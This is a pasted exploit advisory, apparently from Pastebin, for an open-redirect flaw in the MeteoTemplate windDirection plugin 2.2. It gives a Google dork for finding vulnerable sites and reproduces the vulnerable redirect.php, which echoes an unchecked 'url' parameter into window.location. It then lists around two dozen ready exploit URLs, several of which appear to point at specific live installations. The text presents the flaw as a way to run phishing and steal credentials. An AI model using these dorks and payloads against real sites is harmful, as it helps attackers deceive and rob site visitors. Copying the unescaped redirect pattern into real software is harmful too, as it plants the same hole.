Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################################################
- # Exploit Title : MeteoTemplate 17.1 Nectarine windDirection Plugins 2.2 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/02/2019
- # Vendor Homepage : meteotemplate.com
- # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=windDirection_2.2
- # Software Information Link : meteotemplate.com/web/plugins.php
- # Software Version : 2.2 and 17.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:''/meteo/plugins/windDirection/''
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ################################################################################
- # Description about Software :
- ***************************
- This plugin is an extension to the already available analysis of wind direction in the template statistics.
- The data is shown grouped by months or years. It includes tables, wind roses and also a map overlay
- which clearly visualizes from where the wind blows.
- ################################################################################
- # Impact :
- ***********
- This web application MeteoTemplate 17.1 Nectarine windDirection Plugins 2.2 accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
- Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page
- user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Vulnerable Parameter : url=
- *************************
- # Vulnerable Source Code : [ redirect.php ]
- **************************************
- <?php
- ############################################################################
- #
- # Meteotemplate
- # http://www.meteotemplate.com
- # Free website template for weather enthusiasts
- # Author: Jachym
- # Brno, Czech Republic
- # First release: 2015
- #
- ############################################################################
- #
- # Loading Spinner
- #
- # A script which shows a loading spinner while redirecting.
- #
- ############################################################################
- # Version (change log - http://meteotemplate.com/blog/?page_id=42)
- #
- # v6.0 Blueberry 2016-04-09
- #
- ############################################################################
- include("../../config.php");
- include($baseURL."css/design.php");
- include($baseURL."header.php");
- $address = urldecode($_GET["url"]);
- ?>
- <html>
- <head>
- <?php metaHeader()?>
- <style>
- #loading{
- background-color: transparent;
- height: 100%;
- width: 100%;
- position: fixed;
- z-index: 1;
- margin-top: 0px;
- top: 0px;
- }
- #loading-center{
- width: 100%;
- height: 100%;
- position: relative;
- }
- #loading-center-absolute {
- position: absolute;
- left: 50%;
- top: 50%;
- height: 200px;
- width: 200px;
- margin-top: -100px;
- margin-left: -100px;
- }
- .object{
- -moz-border-radius: 50% 50% 50% 50%;
- -webkit-border-radius: 50% 50% 50% 50%;
- border-radius: 50% 50% 50% 50%;
- position: absolute;
- border-left: 5px solid #FFF;
- border-right: 5px solid #FFF;
- border-top: 5px solid transparent;
- border-bottom: 5px solid transparent;
- -webkit-animation: animate 2s infinite;
- animation: animate 2s infinite;
- }
- #object_one{
- left: 75px;
- top: 75px;
- width: 50px;
- height: 50px;
- }
- #object_two{
- left: 65px;
- top: 65px;
- width: 70px;
- height: 70px;
- -webkit-animation-delay: 0.1s;
- animation-delay: 0.1s;
- }
- #object_three{
- left: 55px;
- top: 55px;
- width: 90px;
- height: 90px;
- -webkit-animation-delay: 0.2s;
- animation-delay: 0.2s;
- }
- #object_four{
- left: 45px;
- top: 45px;
- width: 110px;
- height: 110px;
- -webkit-animation-delay: 0.3s;
- animation-delay: 0.3s;
- }
- @-webkit-keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- @keyframes animate {
- 50% {
- -ms-transform: rotate(180deg);
- -webkit-transform: rotate(180deg);
- transform: rotate(180deg);
- }
- 100% {
- -ms-transform: rotate(0deg);
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- }
- </style>
- </head>
- <body onload="redirectpage()">
- <div id="loading">
- <div id="loading-center">
- <div id="loading-center-absolute">
- <div class="object" id="object_four">
- </div>
- <div class="object" id="object_three">
- </div>
- <div class="object" id="object_two">
- </div>
- <div class="object" id="object_one">
- </div>
- </div>
- </div>
- </div>
- </body>
- <script>
- function redirectpage(){
- window.location.href = "<?php echo $address ?>";
- }
- </script>
- </html>
- ####################################################################
- # Open Redirection Exploit :
- *************************
- /meteo/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /template/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /knjazevac/MeteoTemplate/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate_new/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteo_template/template/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /meteotemplate-morro-das-antenas/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /template1/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /busteggia/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /eltiempo/plugins/windDirectionredirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /clima/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /picodabandeira/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /full/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /2017/template/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /segur/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /weather/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wxnet/ple1/template/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /tpl/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /tpl/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /acu/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /josef/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /mt/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /template5/plugins/windDirection/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement